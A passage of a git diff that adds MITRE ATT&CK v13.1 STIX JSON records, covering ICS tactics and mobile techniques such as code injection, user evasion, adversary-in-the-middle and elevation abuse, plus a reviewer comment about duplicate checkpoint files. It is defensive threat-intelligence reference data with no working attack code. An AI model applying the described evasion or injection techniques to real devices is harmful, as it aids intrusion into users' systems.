"execution", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0104", + "external_id": "TA0104" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f.json new file mode 100644 index 0000000000000000000000000000000000000000..5233138e03d7a3a4fe8e7855531896abe139a899 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7ed50e9f-c82a-483e-8ed8-8523e9972a03", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment.\n\nCommand and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use commonly available resources and mimic expected network traffic to avoid detection and suspicion. For instance, commonly used ports and protocols in ICS environments, and even expected IT resources, depending on the target network. Command and Control may be established to varying degrees of stealth, often depending on the victim\u2019s network structure and defenses.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "command-and-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0101", + "external_id": "TA0101" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9.json new file mode 100644 index 0000000000000000000000000000000000000000..e0f2593ecda3abbefefb6570859efc33baabd394 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--a40eb987-7bd7-4e40-bcfa-ef30019cd120", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:18:50.880Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal.\n\nCollection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of [Discovery](https://attack.mitre.org/tactics/TA0102), to compile data on control systems and targets of interest that may be used to follow through on the adversary\u2019s objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plan operations. For example, information repositories on plant data at a high level or device specific programs at a low level. 
Sensitive floor plans, vendor device manuals, and other references may also be at risk and exposed on the internet or otherwise publicly accessible.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "collection", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0100", + "external_id": "TA0100" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7.json new file mode 100644 index 0000000000000000000000000000000000000000..2fbafa3713dfc0959a54b5f7a3ddf7824cc60753 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--da5ec217-893f-4e0c-a8eb-8090c27c4ba1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Evasion", + "description": "The adversary is trying to avoid security defenses.\n\nEvasion consists of techniques that adversaries use to avoid technical defenses throughout their campaign. Techniques used for evasion include removal of indicators of compromise, spoofing communications, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. Methods of defense evasion for this purpose are often more passive in nature.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "evasion", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0103", + "external_id": "TA0103" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024.json new file mode 100644 index 0000000000000000000000000000000000000000..73a720358a01b987b2ad15a67b2e45d95b475740 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--fbddcd5c-6d30-4496-b029-7ae4ca24783c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:15:17.020Z", + "name": "Impair Process Control", + "description": "The adversary is trying to manipulate, disable, or damage physical control processes.\n\nImpair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. 
Adversaries may follow up with or use [Inhibit Response Function](https://attack.mitre.org/tactics/TA0107) techniques in tandem, to assist with the successful abuse of control processes to result in [Impact](https://attack.mitre.org/tactics/TA0105).", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impair-process-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0106", + "external_id": "TA0106" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d-checkpoint.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d-checkpoint.json new file mode 100644 index 0000000000000000000000000000000000000000..27446ba7701cb84826da182f9b57ee7d3185746a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d-checkpoint.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--fe970af0-3ca3-48ea-bade-be2e7d8567a6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. 
The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created": "2020-11-04T16:43:31.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" + }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
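Review bot: This file lives under `.ipynb_checkpoints/`, a Jupyter autosave artifact, and its blob hash `27446ba7701cb84826da182f9b57ee7d3185746a` is identical to the real `attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d.json` added later in this diff, so the commit checks in an exact duplicate of the STIX bundle; the same applies to the `.ipynb_checkpoints/attack-pattern--24a77e53-...-checkpoint.json` file in the following hunk. Duplicated bundles with the same STIX `id` can confuse tooling that loads every `*.json` under `cti-ATT-CK-v13.1/` into one collection, since it will see the same object twice. I would drop both checkpoint files from the commit and add a `.gitignore` entry such as `.ipynb_checkpoints/` so editor artifacts are not committed alongside the vendored ATT&CK data.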
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08-checkpoint.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08-checkpoint.json new file mode 100644 index 0000000000000000000000000000000000000000..340e35ac733ac9d05ea651286965db1c44fabf06 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/.ipynb_checkpoints/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08-checkpoint.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--9b5ba1f9-1270-4ac9-8daa-1862b7d7053e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "created": "2022-04-11T20:05:56.069Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1628.002", + "url": "https://attack.mitre.org/techniques/T1628/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary\u2019s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device\u2019s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:05:56.069Z", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. 
Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d.json new file mode 100644 index 0000000000000000000000000000000000000000..27446ba7701cb84826da182f9b57ee7d3185746a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--fe970af0-3ca3-48ea-bade-be2e7d8567a6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. 
The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created": "2020-11-04T16:43:31.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" + }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa.json new file mode 100644 index 0000000000000000000000000000000000000000..0baf9cb31d72c0c151e90053bfabc4a7bd1f68e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa.json 
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--d0544880-3945-421e-8d41-0ba7e91c8e2f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa", + "created": "2019-10-30T15:37:55.029Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1540", + "url": "https://attack.mitre.org/techniques/T1540" + }, + { + "source_name": "Fadeev Code Injection Aug 2018", + "url": "https://fadeevab.com/shared-library-injection-on-android-8/", + "description": "Alexandr Fadeev. (2018, August 26). Shared Library Injection on Android 8.0. Retrieved October 30, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + }, + { + "source_name": "Shunix Code Injection Mar 2016", + "url": "https://shunix.com/shared-library-injection-in-android/", + "description": "Shunix . (2016, March 22). Shared Library Injection in Android. Retrieved October 30, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. 
Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.\n\nWith root access, `ptrace` can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application\u2019s process.(Citation: Google Triada June 2019)\n", + "modified": "2022-03-30T19:14:20.369Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Code Injection", + "x_mitre_detection": "Code injection can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13.json new file mode 100644 index 0000000000000000000000000000000000000000..a8b46e283085995bd86e5c4b791273ffa5f397bc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13.json 
@@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--8c6a358b-cd1e-4201-b041-36f95c717065", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-15T16:39:32.207Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). \n\n \n\n[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. \n\n \n\nOutside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. \n\n \n\nIf applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. 
Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. \n\n \n\nOn both Android and iOS, users must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. Users can see registered VPN services in the device settings. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "created": "2022-04-05T20:11:08.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1638", + "external_id": "T1638" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "external_id": "CEL-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "external_id": "APP-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "external_id": "APP-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-8.html", + "external_id": "APP-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-12.html", + "external_id": "ECO-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3.json new file mode 100644 index 0000000000000000000000000000000000000000..b76106203dd342d9929ca38c9d44788578041486 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--6c9a56bc-e25c-42cb-b0e7-7da8b78c3cdf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-15T16:23:59.281Z", + "name": "Abuse Elevation Control Mechanism", + "description": "Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "When an application requests administrator permission, users are presented with a popup and the option to grant or deny the request. Application vetting services can detect when an application requests administrator permission. 
Extra scrutiny could be applied to applications that do", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "created": "2022-04-01T15:54:05.633Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1626", + "external_id": "T1626" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d.json new file mode 100644 index 0000000000000000000000000000000000000000..5dd77338b1450d2cc6a2bbcaaf773769bafc7416 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d.json 
